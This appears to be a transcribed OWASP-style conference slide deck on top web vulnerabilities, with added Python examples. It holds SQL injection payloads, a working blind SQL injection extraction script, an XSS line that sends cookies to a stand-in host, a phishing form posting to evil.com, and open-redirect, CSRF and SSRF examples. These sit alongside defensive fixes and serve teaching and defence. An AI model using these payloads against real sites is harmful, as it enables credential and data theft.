
QA Fest 2019. Serhii Korolenko (Сергій Короленко). Top web vulnerabilities in 40 minutes


We will talk about the most common mistakes web application developers make and how an attacker can turn them to their advantage, covering as much material as possible in a short time.

Published in: Education

  1. KYIV 2019. Serhii Korolenko. All vulnerabilities in web applications
  2. Bugcrowd's Vulnerability Rating Taxonomy
  3-4. RCE | Remote Code Execution | Code injection
  5-9. SQL Injection
  10. SQL Injection techniques, each with the slide's example payload (MySQL syntax; the injection point is a numeric id, so no quote is needed to break out of the query). Note that MySQL only treats `--` as a comment when it is followed by whitespace, so in practice the payloads are sent as `-- ` or with `#`:
     Stacked queries: 1; SELECT version()--
     UNION query-based: 1 UNION ALL SELECT NULL,version()--
     Error-based (duplicate-key error leaks version() via rand(0)/GROUP BY): 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--
     Boolean-based blind (one character per true/false answer): 1 AND (ascii(substr((SELECT version()),1,1))) > 52--
     Time-based blind (one character per delayed/undelayed response): 1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)--
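The boolean-based blind payload on the slide is one probe of a loop; the following added example (not from the deck, written for this page) runs that loop end to end against an in-memory SQLite database. The schema, the `users` table and the secret value are constructed for the example, and SQLite spells MySQL's `ascii()` as `unicode()`; otherwise the payload shape is the slide's `1 AND ascii(substr((SELECT ...),pos,1)) > N`. The vulnerable function concatenates the id into the SQL text and only reveals whether a row matched, which is all the attack needs; the parameterised version beside it returns nothing useful to the same loop.

```python
import sqlite3


def make_db():
    """Constructed demo database (not from the slides): one table with a secret to steal."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 's3cr3t')")
    return conn


def vulnerable_lookup(conn, user_id):
    """The bug from the slides: the id is pasted into the SQL text.
    The caller only learns whether a row came back, which is exactly the
    true/false oracle a boolean-based blind attack needs."""
    sql = f"SELECT name FROM users WHERE id = {user_id}"
    return len(conn.execute(sql).fetchall()) > 0


def safe_lookup(conn, user_id):
    """The fix: bind the value as a parameter; the SQL text never changes,
    so the payload is compared with the id column as an ordinary string."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchall()
    return len(rows) > 0


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind extraction of the value returned by `subquery`.
    Each character is found by binary search over the oracle's answer to
    `1 AND unicode(substr((subquery),pos,1)) > mid`, i.e. about seven
    requests per character instead of one per candidate byte."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"1 AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            if oracle(payload):
                lo = mid + 1      # character code is above mid
            else:
                hi = mid          # character code is mid or below (or the comparison was NULL)
        if lo == 0:
            # substr() past the end of the value yields '' and unicode('') is NULL,
            # so every comparison is false: the whole value has been read.
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    conn = make_db()
    target = "SELECT secret FROM users WHERE name='alice'"
    print("vulnerable:", blind_extract(lambda p: vulnerable_lookup(conn, p), target))
    print("parameterised:", repr(blind_extract(lambda p: safe_lookup(conn, p), target)))
```

The time-based variant on the slide is the same loop with the oracle replaced by "did the response take at least the sleep() interval"; SQLite has no sleep(), so the example keeps the boolean form. Against the parameterised lookup the loop returns an empty string after its first seven requests, because no row has an id equal to the literal string `1 AND unicode(...)`.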
  11. XXE | XML external entity injection
  12. FILE INCLUSION
     <?php $file = $_GET["file"]; include("/var/www/backend/$file"); ?>
     https://example.com/?page=contact.php
     (The slide's URL passes `page` while the snippet reads `file`; whichever parameter the script reads, its value is joined onto the include path unchecked.)
  13. DIRECTORY TRAVERSAL
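The include on slide 12 joins user input onto `/var/www/backend/` with no check, so `../../etc/passwd` (or an absolute path) walks out of that directory. The added example below is not from the deck; it takes the slide's include root as an assumption and shows two fixes in Python: a containment check that normalises the joined path and insists it stays under the base directory, and the stronger allow-list approach where the parameter can only select from fixed page names (the names are constructed for the example). The containment check is pure string logic so it runs anywhere; on a real server the joined path should additionally go through `os.path.realpath` so a symlink inside the directory cannot point back out.

```python
import posixpath

# Assumed include root, taken from the slide's include("/var/www/backend/$file").
BASE_DIR = "/var/www/backend"


def is_traversal(requested, base_dir=BASE_DIR):
    """True when `requested`, joined onto base_dir and normalised, would land
    outside base_dir. The prefix is compared with a trailing slash so that
    /var/www/backend2 is not mistaken for a child of /var/www/backend."""
    if "\x00" in requested:
        # Null byte: the classic %00 truncation trick against older PHP; reject outright.
        return True
    candidate = posixpath.normpath(posixpath.join(base_dir, requested))
    return candidate != base_dir and not candidate.startswith(base_dir + "/")


def resolve_page(requested, allowed=("contact.php", "about.php", "index.php")):
    """Preferred fix: the parameter selects a name from a fixed allow-list
    (page names constructed for the example); anything else is refused."""
    if requested in allowed:
        return posixpath.join(BASE_DIR, requested)
    return None


if __name__ == "__main__":
    for probe in ("contact.php", "../../etc/passwd", "/etc/passwd", "contact.php\x00.jpg"):
        print(repr(probe), "traversal" if is_traversal(probe) else "ok", resolve_page(probe))
```

Note that `posixpath.join` discards the base when the second argument is absolute, which is why `/etc/passwd` must be caught by the containment test rather than by looking for `..`. A payload such as `....//....//etc/passwd` only works against filters that strip `../` once; after normalisation it stays inside the directory and is reported as safe, which is correct.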
  14-15. UNSAFE FILE UPLOAD
  16. CRLF injection (CRLF, \r\n, %0D%0A)
  17. HTML Injection
     Input: Hi! My name is <h1>hacker</h1>
     Rendered: Hello HACKER (the markup is interpreted rather than displayed)
     Injected phishing form: Hi! My name is <h1>Log in to view a content</h1> <form action="http://evil.com"> Username: <input name="username"><br> Password: <input name="password"><br> <input type="submit"> </form>
  18. XSS | Cross Site Scripting
  19. XSS Stored/Reflected
  20. XSS | Cross Site Scripting: www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
  21. Open Redirection: https://bank.com/redirect.php?go=http://attacker.com/phish/
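The redirect on slide 21 forwards to whatever `go` contains, so the bank's own domain lends credibility to a phishing link. The added example below (written for this page, not taken from the deck) validates the target the way a practitioner would: it assumes the site host is `bank.com` from the slide's URL, accepts only same-site paths or absolute https URLs whose host is exactly that, and falls back to a default page for the usual bypasses, including scheme-relative `//attacker.com`, `javascript:`, subdomain look-alikes, userinfo tricks such as `bank.com@attacker.com`, and backslashes, which browsers treat as slashes but `urllib.parse` does not.

```python
from urllib.parse import urlparse

# Assumed: the host that issues the redirect, from the slide's https://bank.com/redirect.php?go=...
SITE_HOST = "bank.com"


def safe_redirect_target(go, default="/"):
    """Return `go` only if it stays on our site, otherwise the default landing page.

    Accepted: a path with a single leading '/', or an absolute https URL whose
    host is exactly SITE_HOST. Rejected: other hosts, scheme-relative //host,
    non-http schemes such as javascript:, look-alike subdomains, userinfo
    tricks (user@host), backslashes (browsers read them as '/', urlparse does
    not) and whitespace or control characters (browsers strip some of them)."""
    if not go or "\\" in go or any(ord(c) < 0x21 for c in go):
        return default
    parsed = urlparse(go)
    if parsed.scheme or parsed.netloc:
        # Absolute or scheme-relative URL: must be https and exactly our host.
        # parsed.hostname is the part after any user@ and before any :port, lower-cased.
        if parsed.scheme == "https" and parsed.hostname == SITE_HOST:
            return go
        return default
    # Relative target: one leading slash; '//' would be protocol-relative.
    if go.startswith("/") and not go.startswith("//"):
        return go
    return default


if __name__ == "__main__":
    for probe in ("http://attacker.com/phish/", "//attacker.com/", "/account",
                  "https://bank.com@attacker.com/", "https://bank.com/account"):
        print(repr(probe), "->", safe_redirect_target(probe))
```

Returning a path rather than a full URL wherever possible is the simplest policy; if the application only ever needs to send users back to its own pages, the absolute-URL branch can be dropped entirely.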
  22. CSRF | Cross-Site Request Forgery
     Legitimate request: http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280
     Forged request (same victim account as source, attacker's account as destination): http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483
  23. CSRF | Cross-Site Request Forgery
  24. SSRF | Server Side Request Forgery: http://example.com/?url=http://localhost/server-status
  25. Default Credentials/Configuration
  26. Authentication Bypass
  27. Weak Password Policy
  28. Weak password reset question/answer
  29. Weak password change/reset
     Predictable tokens: three reset links issued within a couple of minutes of each other:
       http://bank.com/reset_password?email=ololo@example.com&token=1561324612
       http://bank.com/reset_password?email=ololo@example.com&token=1561324754
       http://bank.com/reset_password?email=ololo@example.com&token=1561324698
     The values look like Unix timestamps of the request, so an attacker who triggers a reset for the victim only has to try the few seconds around that moment.
     Token derived from the account: MD5("ololo@example.com") = 83fa8dbfe2725ff513c4028a7f60df36, so the reset link for any account can be computed without ever seeing the e-mail:
       http://bank.com/reset_password?email=ololo@example.com&token=83fa8dbfe2725ff513c4028a7f60df36
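Both schemes on slide 29 fail for the same reason: the token is a function of something the attacker knows (the time, or the e-mail address). The added example below is not from the deck; it reproduces the MD5-of-email scheme only for contrast and then shows the properties a reset token needs: generated from the OS CSPRNG, stored only as a hash so a database leak does not hand out live tokens, expiring, compared in constant time, and usable once. The in-memory dictionary stands in for a database table and the clock is injectable so expiry can be exercised without waiting; both are assumptions of the example.

```python
import hashlib
import hmac
import secrets
import time


def weak_token_md5(email):
    """The slide's broken scheme: the token is MD5 of the e-mail address, so
    anyone can compute the reset link for any account. Kept only for contrast."""
    return hashlib.md5(email.encode()).hexdigest()


class ResetStore:
    """Unguessable, hashed-at-rest, expiring, single-use password reset tokens.

    `_pending` is an in-memory stand-in for a database table (constructed for
    the example); `now` is injectable so expiry can be tested without sleeping."""

    def __init__(self, ttl_seconds=900, now=time.time):
        self._ttl = ttl_seconds
        self._now = now
        self._pending = {}   # email -> (sha256(token) hex, expires_at)

    @staticmethod
    def _digest(token):
        # Only the hash is stored; the raw token exists in the e-mail link alone.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, email):
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, independent of time and identity
        self._pending[email] = (self._digest(token), self._now() + self._ttl)
        return token

    def redeem(self, email, token):
        entry = self._pending.get(email)
        if entry is None:
            return False
        stored_digest, expires_at = entry
        if self._now() > expires_at:
            del self._pending[email]        # expired: discard, never honour
            return False
        if not hmac.compare_digest(stored_digest, self._digest(token)):
            return False                    # constant-time compare, no early exit on first wrong byte
        del self._pending[email]            # single use: a replayed link fails
        return True


if __name__ == "__main__":
    store = ResetStore()
    link_token = store.issue("ololo@example.com")
    print("guessable:", weak_token_md5("ololo@example.com"))
    print("redeem once:", store.redeem("ololo@example.com", link_token))
    print("redeem again:", store.redeem("ololo@example.com", link_token))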
  30. Bypass 2FA
  31. Privilege Escalation
  32. Broken Access Control: http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!
  33. COOKIES Attributes
  34. Session Fixation
  35. Sensitive Data Exposure: passwords, API keys, an exposed /.git/ directory
  36. Directory Listing: DirSearch (backups, logs, etc.)
  37. Unencrypted Communication
  38. Application running as a privileged user (uid=0(root)); No Rate Limits; CAPTCHA Bypass
  39. Security Headers
     Server headers that protect against attacks:
       HTTP Strict Transport Security
       Content Security Policy
       Access-Control-Allow-Origin (a CORS header; a permissive value such as * relaxes rather than tightens the policy)
       X-Frame-Options
       X-XSS-Protection
       X-Content-Type-Options
     Server headers that leak information:
       Server
       X-Powered-By
       X-AspNet-Version
  40. Detailed Error
  41. https://www.youtube.com/OWASPKyiv https://www.facebook.com/owaspkyiv https://owasp.slack.com/messages/chapter-ua/
